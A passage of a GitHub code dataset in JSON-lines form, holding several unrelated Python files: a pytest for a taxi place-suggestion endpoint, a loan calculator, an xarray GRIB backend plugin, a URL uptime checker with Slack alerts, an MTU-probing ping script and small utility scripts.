self.model.predict(x)\n","repo_name":"tabeaeggler/UrbanMobility","sub_path":"src/models_ml_dl/deep_learning_model.py","file_name":"deep_learning_model.py","file_ext":"py","file_size_in_byte":11828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33638787932","text":"import pytest\n\nUSER_ID = '12345678901234567890123456789012'\nDEFAULT_PHONE_ID = '02aaaaaaaaaaaaaaaaaaaa01'\nDEFAULT_UID = '400000000'\n\nYAMAPS_ADDRESS = {\n 'geocoder': {\n 'address': {\n 'formatted_address': 'Russia, Moscow, Petrovskiy alley, 21',\n 'country': 'Russia',\n 'locality': 'Moscow',\n },\n 'id': '1',\n },\n 'uri': 'ymapsbm1://URI_1_1',\n 'name': 'Petrovskiy alley, 21',\n 'description': 'Russia, Moscow',\n 'geometry': [37.586634, 55.736716],\n}\n\nPLACE = [\n {\n 'info': {\n 'timeinfo': {\n 'full_text': 'Вы были здесь уже 3 раз',\n 'short_text': '3 раз за 2 недели',\n },\n 'available_types': ['home', 'other'],\n },\n 'point': {\n 'coordinates': [37.586634, 55.736716],\n 'subtitle': 'Petrovskiy alley, 21',\n 'title': 'Russia, Moscow, Petrovskiy alley, 21',\n 'uri': 'ymapsbm1://URI_1_1',\n },\n },\n]\n\nSUGGEST_PARAMS = {\n 'match': {'predicate': {'type': 'true'}, 'enabled': True},\n 'name': 'userplaces_suggest_params',\n 'consumers': ['userplaces/userplaces'],\n 'clauses': [],\n 'is_config': True,\n}\n\n\n@pytest.mark.translations(\n client_messages={\n 'userplaces.suggest.short_text_rides_count': {\n 'ru': '%(rides_count)s раз',\n },\n 'userplaces.suggest.short_text_weeks_count': {\n 'ru': ' за %(weeks_count)s недели',\n },\n 'userplaces.suggest.full_text': {\n 'ru': 'Вы были здесь уже %(rides_count)s раз',\n },\n },\n)\n@pytest.mark.parametrize(\n 'status_code,max_results,response_place',\n [\n pytest.param(\n 200,\n 80,\n PLACE,\n marks=pytest.mark.experiments3(\n **SUGGEST_PARAMS,\n default_value={\n 'routehistory_max_size': 80,\n 'min_dist_from_userplace': 200,\n 'min_dist_from_completion_point': 2000,\n 'min_near_points_size': 3,\n 'max_weeks_count_from_ride': 12,\n },\n ),\n ),\n pytest.param(\n 500,\n 30,\n [],\n marks=pytest.mark.experiments3(\n **SUGGEST_PARAMS,\n default_value={\n 'routehistory_max_size': 30,\n 'min_dist_from_userplace': 200,\n 'min_dist_from_completion_point': 2000,\n 'min_near_points_size': 3,\n 'max_weeks_count_from_ride': 12,\n },\n ),\n ),\n pytest.param(\n 200,\n 80,\n [],\n 
marks=pytest.mark.experiments3(\n **SUGGEST_PARAMS,\n default_value={\n 'routehistory_max_size': 80,\n 'min_dist_from_userplace': 20000,\n 'min_dist_from_completion_point': 2000,\n 'min_near_points_size': 3,\n 'max_weeks_count_from_ride': 12,\n },\n ),\n ),\n pytest.param(\n 200,\n 80,\n [],\n marks=pytest.mark.experiments3(\n **SUGGEST_PARAMS,\n default_value={\n 'routehistory_max_size': 80,\n 'min_dist_from_userplace': 200,\n 'min_dist_from_completion_point': 2000,\n 'min_near_points_size': 4,\n 'max_weeks_count_from_ride': 12,\n },\n ),\n ),\n pytest.param(\n 200,\n 80,\n [],\n marks=pytest.mark.experiments3(\n **SUGGEST_PARAMS,\n default_value={\n 'routehistory_max_size': 80,\n 'min_dist_from_userplace': 200,\n 'min_dist_from_completion_point': 200,\n 'min_near_points_size': 3,\n 'max_weeks_count_from_ride': 12,\n },\n ),\n ),\n pytest.param(\n 200,\n 80,\n [],\n marks=pytest.mark.experiments3(\n **SUGGEST_PARAMS,\n default_value={\n 'routehistory_max_size': 80,\n 'min_dist_from_userplace': 200,\n 'min_dist_from_completion_point': 200,\n 'min_near_points_size': 3,\n 'max_weeks_count_from_ride': 1,\n },\n ),\n ),\n ],\n ids=[\n 'simple_suggest_userplace',\n 'routehistory_error',\n 'close_to_userplace',\n 'min_points_count',\n 'min_distance_to_completion_point',\n 'max_weeks_count',\n ],\n)\n@pytest.mark.now('2022-05-12T17:38:12.955+0000')\nasync def test_suggest_userplace(\n taxi_userplaces,\n load_json,\n mockserver,\n status_code,\n max_results,\n yamaps,\n response_place,\n):\n @mockserver.json_handler('/routehistory/routehistory/get')\n def _mock_routehistory(request):\n assert request.json['max_results'] == max_results\n if status_code == 500:\n return mockserver.make_response(status=500)\n return load_json('routehistory_response.json')\n\n yamaps.add_fmt_geo_object(YAMAPS_ADDRESS)\n\n response = await taxi_userplaces.post(\n '4.0/userplaces/suggested-points',\n headers={\n 'X-YaTaxi-UserId': USER_ID,\n 'X-YaTaxi-PhoneId': DEFAULT_PHONE_ID,\n 'Accept-Language': 'ru',\n 'X-Yandex-UID': DEFAULT_UID,\n 'X-Request-Application': 'app_name=yango_android',\n },\n json={'coordinates': [37.586634, 55.736716]},\n )\n assert response.status_code == status_code\n if status_code == 200:\n assert response.json()['places'] == response_place\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/tests_userplaces/test_userplaces_suggest.py","file_name":"test_userplaces_suggest.py","file_ext":"py","file_size_in_byte":6003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"20158267188","text":"from requests import post\nfrom models.response import ErrorResponse, PlaceOrderSuccessResponse\nfrom models.request import OrderAttributes, OrderFields, CreateOrderRequest\n\n\ndef createOrderRequest(app, consumer_id, name):\n headers = {\n 'Authorization': f'Bearer {app.config[\"ACCESS_TOKEN\"]}',\n \"accept\": \"application/json\",\n \"content-type\": \"application/json\",\n }\n\n payload = CreateOrderRequest(\n data=OrderFields(\n type=\"order\",\n attributes=OrderAttributes(\n consumer_id=f'{consumer_id}',\n portfolio_id=app.config[\"PORTFOLIO_ID\"],\n sku=app.config[\"SKU\"]\n )\n )\n ).json()\n\n # Make request to /data-access/orders/\n r = post(app.config[\"ORDER_DATA_URL\"],\n headers=headers, data=payload)\n\n # Make response json format\n response_body = r.json()\n\n if not r.ok:\n app.logger.error(\n \"Error making order. 
Response Body: %s\", response_body)\n return ErrorResponse(\n status=\"FAILED\",\n errors=[\n {\n \"status\": response_body[\"status_code\"],\n \"title\": response_body[\"status_message\"],\n \"detail\": response_body[\"status_details\"]\n }\n ])\n\n data = response_body['data']\n attributes = response_body['data']['attributes']\n app.logger.info(\n \"Success making order. Response Body: %s\", response_body)\n return PlaceOrderSuccessResponse(\n consumer_id=consumer_id,\n order_id=data[\"id\"],\n name=name,\n sku=app.config[\"SKU\"],\n status=attributes[\"status\"]\n )\n","repo_name":"bloomcredit/Bloom-Sample-Apps","sub_path":"manual-report-viewer/api/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"37354694818","text":"import math\nimport sys\narguments = sys.argv\n\ndef data_input():\n loan_type = ''\n principal = 0\n payment = 0\n periods = 0\n interest = 0\n for element in arguments: # retrieves different parameters from the command line\n if '--type=' in element:\n loan_type += element.replace('--type=', '')\n elif '--principal=' in element:\n principal += int(element.replace('--principal=', ''))\n elif '--payment=' in element:\n payment += int(element.replace('--payment=', ''))\n elif '--periods=' in element:\n periods += int(element.replace('--periods=', ''))\n elif '--interest=' in element:\n interest += float(element.replace('--interest=', ''))\n if len(arguments) >= 5 and (type == 'annuity' or type == 'diff'): # checks parameters' correctness, enters the right module\n if principal == 0 and type == 'annuity' and payment > 0 and periods > 0 and interest > 0:\n calculate_loan_principal(payment, periods, interest)\n elif payment == 0 and principal > 0 and periods > 0 and interest > 0:\n calculate_monthly_payment(type, principal, periods, interest)\n elif periods == 0 and type == 'annuity' and principal > 0 and payment > 0 and interest > 0:\n calculate_payments_number(principal, payment, interest)\n else:\n print('Incorrect parameters')\n else:\n print('Incorrect parameters')\n\ndef calculate_payments_number(principal, payment, interest): # calculates number of payments\n nominal_interest = interest / (12 * 100)\n periods = math.ceil(math.log(payment / (payment - (nominal_interest * principal)), 1 + nominal_interest))\n if periods < 12:\n print(f'It will take {periods} months to repay the loan')\n elif periods == 12:\n print(f'It will take 1 year to repay the loan')\n elif 12 < periods < 24:\n print(f'It will take 1 year and {periods % 12} months to repay the loan')\n else:\n if periods % 12 == 0:\n print(f'It will take {int(periods / 12)} years to repay the loan')\n else:\n print(f'It will take {periods // 12} years and {periods % 12}to repay the loan')\n print(f'Overpayment = {int(payment * periods - principal)}')\n\ndef calculate_monthly_payment(loan_type, principal, periods, interest): # calculates monthly payment\n nominal_interest = interest / (12 * 100)\n if loan_type == 'annuity': # monthly annuity payment\n annuity_payment = math.ceil(principal * (nominal_interest * math.pow(1 + nominal_interest, periods)) / ((pow(1 + nominal_interest, periods)) - 1))\n print(f'Your monthly payment = {annuity_payment}!')\n print(f'Overpayment = {annuity_payment * periods - principal}')\n elif loan_type == 'diff': # monthly differentiate payment\n diff_payment_sum = 0.0\n for i in range(1, periods + 1):\n diff_payment = (principal / periods) + 
(nominal_interest * (principal - ((principal * (i - 1)) / periods)))\n print(f'Month {i}: payment is {math.ceil(diff_payment)}')\n diff_payment_sum += math.ceil(diff_payment)\n print(f'\\nOverpayment = {int(diff_payment_sum - principal)}')\n\ndef calculate_loan_principal(payment, periods, interest): # calculates loan principal\n nominal_interest = interest / (12 * 100)\n principal = payment / ((nominal_interest * math.pow(1 + nominal_interest, periods)) / ((pow(1 + nominal_interest, periods)) - 1))\n print(f'Your loan principal = {int(principal)}!')\n print(f'Overpayment = {math.ceil(payment * periods - principal)}')\n\ndata_input()","repo_name":"danban19/loan_calculator","sub_path":"creditcalc.py","file_name":"creditcalc.py","file_ext":"py","file_size_in_byte":3617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4125288769","text":"import pandas as pd\nfrom PIL import Image\nimport os\n\ndef analyzer(path_to_images='../data/images', save_to=\"../data/info.csv\"):\n filenames = os.listdir(path_to_images)\n sizes = {}\n for filename in filenames:\n image = Image.open(os.path.join(path_to_images, filename))\n sizes[image.size] = sizes.get(image.size, 0) + 1\n sizes = sorted(sizes.items(), key=lambda x: x[1], reverse=True)\n df = pd.DataFrame(sizes, columns=[\"size\", \"count\"])\n df.to_csv(save_to)\n\nif __name__ == \"__main__\":\n analyzer()\n","repo_name":"ThePaniv/Google-Landmark-Retrieval-Challenge","sub_path":"scripts/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"36932614848","text":"import os\nimport typing as T\nfrom distutils.version import LooseVersion\n\nimport numpy as np # type: ignore\nimport xarray as xr\n\nfrom . import dataset\n\nif LooseVersion(xr.__version__) <= \"0.17.0\":\n raise ImportError(\"xarray_plugin module needs xarray version >= 0.18+\")\n\nfrom xarray.backends.common import (\n BACKEND_ENTRYPOINTS,\n AbstractDataStore,\n BackendArray,\n BackendEntrypoint,\n)\n\n# FIXME: Add a dedicated lock, even if ecCodes is supposed to be thread-safe\n# in most circumstances. 
See:\n# https://confluence.ecmwf.int/display/ECC/Frequently+Asked+Questions\nECCODES_LOCK = xr.backends.locks.SerializableLock() # type: ignore\n\n\nclass CfGribDataStore(AbstractDataStore):\n \"\"\"\n Implements the ``xr.AbstractDataStore`` read-only API for a GRIB file.\n \"\"\"\n\n def __init__(\n self,\n filename: str,\n lock: T.Union[T.ContextManager[T.Any], None] = None,\n **backend_kwargs: T.Any,\n ):\n if lock is None:\n lock = ECCODES_LOCK\n self.lock = xr.backends.locks.ensure_lock(lock) # type: ignore\n self.ds = dataset.open_file(filename, **backend_kwargs)\n\n def open_store_variable(self, var: dataset.Variable,) -> xr.Variable:\n if isinstance(var.data, np.ndarray):\n data = var.data\n else:\n wrapped_array = CfGribArrayWrapper(self, var.data)\n data = xr.core.indexing.LazilyIndexedArray(wrapped_array) # type: ignore\n encoding = self.ds.encoding.copy()\n encoding[\"original_shape\"] = var.data.shape\n\n return xr.Variable(var.dimensions, data, var.attributes, encoding) # type: ignore\n\n def get_variables(self) -> xr.core.utils.Frozen[T.Any, T.Any]:\n return xr.core.utils.FrozenDict(\n (k, self.open_store_variable(v)) for k, v in self.ds.variables.items()\n )\n\n def get_attrs(self) -> xr.core.utils.Frozen[T.Any, T.Any]:\n return xr.core.utils.Frozen(self.ds.attributes)\n\n def get_dimensions(self) -> xr.core.utils.Frozen[T.Any, T.Any]:\n return xr.core.utils.Frozen(self.ds.dimensions)\n\n def get_encoding(self) -> T.Dict[str, T.Set[str]]:\n dims = self.get_dimensions()\n encoding = {\"unlimited_dims\": {k for k, v in dims.items() if v is None}}\n return encoding\n\n\nclass CfGribBackend(BackendEntrypoint):\n def guess_can_open(self, store_spec: str,) -> bool:\n try:\n _, ext = os.path.splitext(store_spec)\n except TypeError:\n return False\n return ext in {\".grib\", \".grib2\", \".grb\", \".grb2\"}\n\n def open_dataset(\n self,\n filename_or_obj: str,\n *,\n mask_and_scale: bool = True,\n decode_times: bool = True,\n concat_characters: bool = True,\n decode_coords: bool = True,\n drop_variables: T.Union[T.Iterable[str], None] = None,\n use_cftime: T.Union[bool, None] = None,\n decode_timedelta: T.Union[bool, None] = None,\n lock: T.Union[T.ContextManager[T.Any], None] = None,\n indexpath: str = \"{path}.{short_hash}.idx\",\n filter_by_keys: T.Dict[str, T.Any] = {},\n read_keys: T.Iterable[str] = (),\n encode_cf: T.Sequence[str] = (\"parameter\", \"time\", \"geography\", \"vertical\"),\n squeeze: bool = True,\n time_dims: T.Iterable[str] = (\"time\", \"step\"),\n errors: str = \"warn\",\n extra_coords: T.Dict[str, str] = {},\n ) -> xr.Dataset:\n\n store = CfGribDataStore(\n filename_or_obj,\n indexpath=indexpath,\n filter_by_keys=filter_by_keys,\n read_keys=read_keys,\n encode_cf=encode_cf,\n squeeze=squeeze,\n time_dims=time_dims,\n lock=lock,\n errors=errors,\n extra_coords=extra_coords,\n )\n with xr.core.utils.close_on_error(store):\n vars, attrs = store.load() # type: ignore\n encoding = store.get_encoding()\n vars, attrs, coord_names = xr.conventions.decode_cf_variables(\n vars,\n attrs,\n mask_and_scale=mask_and_scale,\n decode_times=decode_times,\n concat_characters=concat_characters,\n decode_coords=decode_coords,\n drop_variables=drop_variables,\n use_cftime=use_cftime,\n decode_timedelta=decode_timedelta,\n ) # type: ignore\n\n ds = xr.Dataset(vars, attrs=attrs)\n ds = ds.set_coords(coord_names.intersection(vars))\n ds.set_close(store.close)\n ds.encoding = encoding\n return ds\n\n\nclass CfGribArrayWrapper(BackendArray):\n def __init__(\n self, datastore: 
CfGribDataStore, array: T.Union[dataset.OnDiskArray, np.ndarray]\n ):\n self.datastore = datastore\n self.shape = array.shape\n self.dtype = array.dtype\n self.array = array\n\n def __getitem__(self, key: xr.core.indexing.ExplicitIndexer,) -> np.ndarray:\n return xr.core.indexing.explicit_indexing_adapter(\n key, self.shape, xr.core.indexing.IndexingSupport.BASIC, self._getitem\n )\n\n def _getitem(self, key: T.Tuple[T.Any, ...],) -> np.ndarray:\n with self.datastore.lock:\n return self.array[key]\n","repo_name":"deepin-community/cfgrib","sub_path":"cfgrib/xarray_plugin.py","file_name":"xarray_plugin.py","file_ext":"py","file_size_in_byte":5261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"38845290925","text":"#!/usr/bin/python3\n\n# Python script to report status of a URL\n# Sends Slack alert if the request returns anything other than 200\n# Or is unreachable\n\nimport requests\nimport sys\nimport argparse\nimport configparser\nimport json\n\n#Argument parsing\nparser = argparse.ArgumentParser(description=\"Checks uptime for specified URL\")\nparser.add_argument(\"url\", help=\"URL to check\")\nparser.add_argument(\"-v\", \"--verbose\", help=\"Verbose\", action=\"store_true\")\nargs = parser.parse_args()\n\n#Config parsing\nconfig = configparser.ConfigParser()\nconfig.read('config.ini')\nwebhook = config.get('Main', 'webhook')\n\n#Check URL format\nif not args.url.startswith('http'):\n print(\"Please provide schema: http:// or https://\")\n exit(1)\n\n#Check URL status\nif(args.verbose):\n print(\"Checking URL\")\ntry:\n r = requests.head(args.url)\n if(args.verbose):\n print(\"Status Code:\",r.status_code)\n code = str(r.status_code)\n if r.status_code == 200: #Connection Okay\n if(args.verbose):\n print(\"Condition okay!\")\n else:\n if(args.verbose):\n print(\"Condition bad!\")\n statusMsg = \" status code returning \"\n message = client.messages.create(\n to=toNum,\n from_=fromNum,\n body=args.url+statusMsg+code)\nexcept requests.ConnectionError:\n if(args.verbose):\n print(\"Failed to connect, check URL for errors\")\n slack_data = 'URGENT ALERT! 
Cannot connect to: ' + args.url\n slack_response = requests.post(\n webhook, data=json.dumps({'text': slack_data}),\n headers={'Content-Type': 'application/json'})\n if slack_response.status_code is not 200:\n raise ValueError(\n 'Request to slack returned an error %s, the response is:\\n%s'\n % (slack_response.status_code, slack_response.text))\n\n","repo_name":"cskinner74/DownAlert","sub_path":"DownAlert.py","file_name":"DownAlert.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"25891590622","text":"#!/usr/bin/python3\n\nimport validators\nimport subprocess\nimport sys\nimport os\nimport ipaddress\n\n\ndestination = os.getenv(\"DESTINATION_ADDRESS\")\ntimout = os.getenv(\"TIMEOUT\")\nmax_msg_sz = os.getenv(\"MAX_MTU\")\nif max_msg_sz is None:\n max_msg_sz = '10000'\n\nif destination is None or \\\n (timout is not None and not timout.isdigit()) or \\\n (max_msg_sz is not None and not max_msg_sz.isdigit()):\n print(destination, timout)\n print(\"Wait run as sudo docker run -e DESTINATION_ADDRESS='destination ip / public domain name' [-e TIMEOUT='timeout in ms'] [-e MAX_MTU='max boarder of searching default 10000'] mtu_search\")\n exit(0)\nelse:\n max_msg_sz = int(max_msg_sz)\n\nis_valid_ip = False\nis_valid_domain = False\n\n# check ip correctness\ntry:\n ip = ipaddress.ip_address(destination)\n is_valid_ip = True\nexcept Exception:\n pass\n\n# check domain correctness:\ntry:\n validators.domain(destination)\n is_valid_domain = True\nexcept Exception:\n pass\n\nif not is_valid_domain and not is_valid_ip:\n print(\"check correctness of input %s\" % destination)\n exit(1)\n\n\n# check destination\ncommand = ['ping', '-c', '1', '-W']\nif timout is not None:\n command += [str(timout)]\nelse:\n command += ['1']\ncommand.append(destination)\n\ntry:\n response = subprocess.run(command, capture_output=True)\n is_ping_work = response.returncode == 0\nexcept Exception as ex:\n is_ping_work = False\n\nif not is_ping_work:\n print(\"desitanion is unreachable for ping. Posibly impc disable or server doesn't exist on correct adress\")\n exit(1)\n\nL = -1\nR = max_msg_sz + 1\nreal_mtu = None\nwhile L + 1 < R:\n mess_sz = (L + R) // 2\n print('try mtu=%d' % mess_sz)\n command = ['ping', '-c', '1', '-s', str(mess_sz), '-M', 'do']\n if timout is not None:\n command += ['-W', str(timout)]\n command.append(destination)\n try:\n response = subprocess.run(command, capture_output=True)\n stdout = response.stdout.decode()\n try_to_find = f'{mess_sz}('\n\n real_sz = stdout[stdout.find(try_to_find):]\n real_sz = real_sz[len(try_to_find):real_sz.find(')')]\n\n if response.returncode != 0:\n if 'too long' in response.stderr.decode():\n R = mess_sz\n elif len(response.stderr.decode()) == 0:\n print(response)\n print(\"Timeout occur but host may be reachable, you can add timeout as an arg\")\n R = mess_sz\n else:\n print(\"Try to reduce size due to unknown error from ping:\", response)\n R = mess_sz\n else:\n L = mess_sz\n real_mtu = real_sz\n except Exception:\n R = mess_sz\n print(\"Smth went wrong. 
Try to erase msg size:\", response)\n\nif real_mtu is None:\n print(\"host is unreachable\")\nelse:\n print('mtu size is', real_mtu)\n ","repo_name":"Ksenia-C/networks_labs","sub_path":"lab2/mtu_searcher.py","file_name":"mtu_searcher.py","file_ext":"py","file_size_in_byte":2845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"40882753562","text":"def ReturnsNthRoot(integer, n):\n # Adapted from page 25 in book\n root = 0 \n while root**n < abs(integer): \n root = root + 1\n if root**n != abs(integer):\n return\n else:\n if integer < 0:\n root = -root\n return root\n\ninteger = int(input('Enter an integer: '))\nmaxpwr = 5 \nminpwr = 1\n\nwhile minpwr < maxpwr: \n minpwr = minpwr + 1\n root = ReturnsNthRoot(integer, minpwr)\n if root != None:\n print(\"root: {0} pwr: {1}\".format(root, minpwr))\n else:\n print(\"No roots exist for pwr: {0}\".format(minpwr))\n \n","repo_name":"ppysjp93/Introduction-to-Computation-and-Programming-Using-Python-","sub_path":"Chapters/Chapter3/FingerExercises/RootPower/RootPowerSolution/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"24759563233","text":"\"\"\"\nAuthor: Mickaël Descamps - Mineyou\nEmail : mickael.descamps@mineyou.fr\nProjet : Patio numérique\nOrganisation : FougèresLab\nDesc: description\n\npip.py (c) 2021\nCreated: 2021-03-04T20:31:56.992Z\n\"\"\"\n\nimport subprocess\n\ntry:\n result = subprocess.run(\"sudo apt-get install python3-pip\",stdout=subprocess.PIPE,shell=True)\nexcept BaseException as ex:\n print(\"Erreur installation pip\" + repr(ex))\nelse:\n print(\"Installation pip réussie\")\n","repo_name":"fougereslab/Patio-Num-rique","sub_path":"setup/pip.py","file_name":"pip.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"507822577","text":"import boto3\nimport os\n\n\nDATA_SRC= os.getenv('DATA_SRC')\ns3 = boto3.client(\"s3\")\n\n\ndef lambda_handler(event, context):\n obj = s3.get_object(Bucket=DATA_SRC, Key=\"CBOFS/Group_001.geojson\")\n body = obj[\"Body\"].read()\n return {\n 'statusCode': 200,\n 'body': body\n }\n","repo_name":"Streamlines-UNH/tide-maker","sub_path":"functions/map_get_retriever/map_get_retriever.py","file_name":"map_get_retriever.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70326128212","text":"#!/usr/bin/env python \n# Author: Christopher Bull. 
\n# Affiliation: British Antarctic Survey\n# Cambridge, UK\n# Contact: chbull@bas.ac.uk\n# www: christopherbull.com.au\n# Date created: Wed, 22 Jan 2020 17:19:00\n# Machine created on: SB2Vbox\n#\n\n\"\"\"\nPython module to contain useful shared parameters\n\"\"\"\n\nfrom cb2logger import *\nimport collections\nimport os\nfrom mpl_toolkits.axes_grid1.inset_locator import inset_axes, zoomed_inset_axes\nfrom mpl_toolkits.axes_grid1.anchored_artists import AnchoredSizeBar\nimport matplotlib.pyplot as plt\n\ncast_type=collections.OrderedDict()\n\n\ncast_type['001']=['test','']\n# sheldon cove\ncast_type['002']=['icebergs','SC0'] # no ladcp data\ncast_type['003']=['racetrax','SC0']\ncast_type['004']=['racetrax','SC0']\ncast_type['005']=['icebergs','SC1']\ncast_type['006']=['racetrax','SC1']\ncast_type['007']=['racetrax','SC1']\ncast_type['008']=['icebergs','SC2']\ncast_type['009']=['icebergs','SCA']\ncast_type['010']=['racetrax','SCA']\ncast_type['011']=['racetrax','SCA']\ncast_type['012']=['icebergs','SCB']\ncast_type['013']=['icebergs','SC6']\ncast_type['014']=['icebergs','IF1']\ncast_type['015']=['icebergs','IF2']\ncast_type['016']=['icebergs','IF3']\ncast_type['017']=['icebergs','SCC']\ncast_type['018']=['racetrax','SCC']\ncast_type['019']=['racetrax','SCC']\ncast_type['020']=['icebergs','SCD']\ncast_type['021']=['racetrax','SCE']\ncast_type['022']=['racetrax','SCE']\ncast_type['023']=['icebergs','SCE']\n\n# borgen bay\ncast_type['024']=['icebergs','BB0']\ncast_type['025']=['racetrax','BB0']\ncast_type['026']=['racetrax','BB0']\ncast_type['027']=['icebergs','BBX']\ncast_type['028']=['icebergs','BBA']\ncast_type['029']=['racetrax','BBA']\ncast_type['030']=['racetrax','BBA']\ncast_type['031']=['icebergs','BBC']\ncast_type['032']=['racetrax','BBC']\ncast_type['033']=['racetrax','BBC']\ncast_type['034']=['icebergs','BB-ICE3']\ncast_type['035']=['icebergs','BB-ICE4']\ncast_type['036']=['icebergs','BB-ICE2']\ncast_type['037']=['icebergs','BB-ICE1']\ncast_type['038']=['icebergs','BBD']\ncast_type['039']=['racetrax','BBD']\ncast_type['040']=['racetrax','BBD']\ncast_type['041']=['icebergs','BBE']\ncast_type['042']=['racetrax','BBE']\ncast_type['043']=['racetrax','BBE']\ncast_type['044']=['icebergs','BB1']\ncast_type['045']=['EK80cal','']\ncast_type['046']=['icebergs','BBB']\n\n# marian cove\ncast_type['047']=['icebergs','MC1']\ncast_type['048']=['racetrax','MC1']\ncast_type['049']=['icebergs','MC0']\ncast_type['050']=['icebergs','MC2']\ncast_type['051']=['icebergs','MCA']\ncast_type['052']=['racetrax','MCA']\ncast_type['053']=['icebergs','MCB']\ncast_type['054']=['racetrax','MCB']\ncast_type['055']=['icebergs','MCC']\ncast_type['056']=['racetrax','MCC']\ncast_type['057']=['icebergs','MC4'] #4 was possibly a typo?\ncast_type['058']=['icebergs','MCD']\ncast_type['059']=['racetrax','MCD']\ncast_type['060']=['icebergs','MC-ICE1']\ncast_type['061']=['icebergs','MC-ICE2']\ncast_type['062']=['racetrax','MCE']\ncast_type['063']=['icebergs','MCE']\n\ndef inset_title_box(ax,title,bwidth=\"20%\",location=1):\n \"\"\"\n Function that puts title of subplot in a box\n \n :ax: Name of matplotlib axis to add inset title text box too\n :title: 'string to put inside text box'\n :returns: @todo\n \"\"\"\n\n axins = inset_axes(ax,\n width=bwidth, # width = 30% of parent_bbox\n height=.30, # height : 1 inch\n loc=location)\n\n plt.setp(axins.get_xticklabels(), visible=False)\n plt.setp(axins.get_yticklabels(), visible=False)\n axins.set_xticks([])\n axins.set_yticks([])\n\n axins.text(0.5,0.3,title,\n 
horizontalalignment='center',\n transform=axins.transAxes,size=10)\n\ndef mkdir(p):\n \"\"\"make directory of path that is passed\"\"\"\n try:\n os.makedirs(p)\n lg.info(\"output folder: \"+p+ \" does not exist, we will make one.\")\n except OSError as exc: # Python >2.5\n import errno\n if exc.errno == errno.EEXIST and os.path.isdir(p):\n pass\n else: raise\n\nif __name__ == \"__main__\": \n print('not supposed to be run like this!')\n # LogStart('',fout=False)\n # #put useful code here!\n\n # lg.info('')\n # localtime = time.asctime( time.localtime(time.time()) )\n # lg.info(\"Local current time : \"+ str(localtime))\n # lg.info('SCRIPT ended')\n","repo_name":"chrisb13/LADCPproc","sub_path":"plot_casts/shareme.py","file_name":"shareme.py","file_ext":"py","file_size_in_byte":4312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"42100242043","text":"import argparse\n\n\nclass CommandLine(object):\n\n @staticmethod\n def str2bool(v):\n if v.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n elif v.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n else:\n raise argparse.ArgumentTypeError('Boolean value expected.')\n","repo_name":"umbertogriffo/fast-near-duplicate-image-search","sub_path":"src/deduplication/utils/CommandLine.py","file_name":"CommandLine.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"fa","doc_type":"code","stars":131,"dataset":"github-code","pt":"66"} +{"seq_id":"2058551010","text":"\"\"\"\nAll parameters for an evolutionary run\nare stored in here\n\"\"\"\n\n#####################\n# GA parameters\n#####################\npop_size = 10\nmutation_rate = 0.05\nsmall_mutation_rate = 0.01\ncrossover_rate = 0.00\nmax_generations = 1000\nrobot_system = \"aruduino\"\nuse_brain_archive = False\nuse_run_archive = False\nuse_sensory_conditions = False\ndraw_molecules = True\n#####################\n# Simulation parameters\n#####################\ntime_step_length = 0.2\ntime_steps_per_evaluation = 40\n\n#####################\n# Atom parameters\n#####################\n\nmin_message_delay = 1\nmax_message_delay = 20\n\nmin_time_active = 1\nmax_time_active = 40\n\nmin_sensors_in_s_atom = 1\nmax_sensors_in_s_atom = 3\nmin_motors_in_m_atom = 1\nmax_motors_in_m_atom = 4\n\nLWPR = False\n\n#####################\n# Nao parameters\n#####################\nrobot_port = 9560\ngps_server_port = 13375\ngps_client_port = 1025\nuse_distance = True\nnao_starting_position = \"suppine\"\n\n#####################\n# Webots parameters\n#####################\nwebots_timestep_length = 200\n\n#####################\n# Arduino parameters\n#####################\narduino_address = '/dev/tty.usbmodem1421'\narduino_output_pins = [1,2,3,4]\narduino_input_pins = [0,1,2]\narduino_limit = False\narduino_normalise = True\n\nsensor_normalisation_values = {\n\t\t\t\t\t\t\t\t0:[400,700],\n\t\t\t\t\t\t\t\t1:[400,700],\n\t\t\t\t\t\t\t\t2:[400,700]\n\t\t\t\t\t\t\t\t}\nmotor_normalisation_values = {\n\t\t\t\t\t\t\t\t0:[20,100],\n\t\t\t\t\t\t\t\t1:[20,100],\n\t\t\t\t\t\t\t\t2:[20,100],\n\t\t\t\t\t\t\t\t3:[20,100],\n\t\t\t\t\t\t\t\t}\n\n","repo_name":"alexanderchurchill/EROS","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"8575861488","text":"import hcsc\r\nimport photon_in\r\nimport test\r\nimport nu\r\n\r\n\r\ndef main():\r\n scell = hcsc.hcsc()\r\n ph_in = 
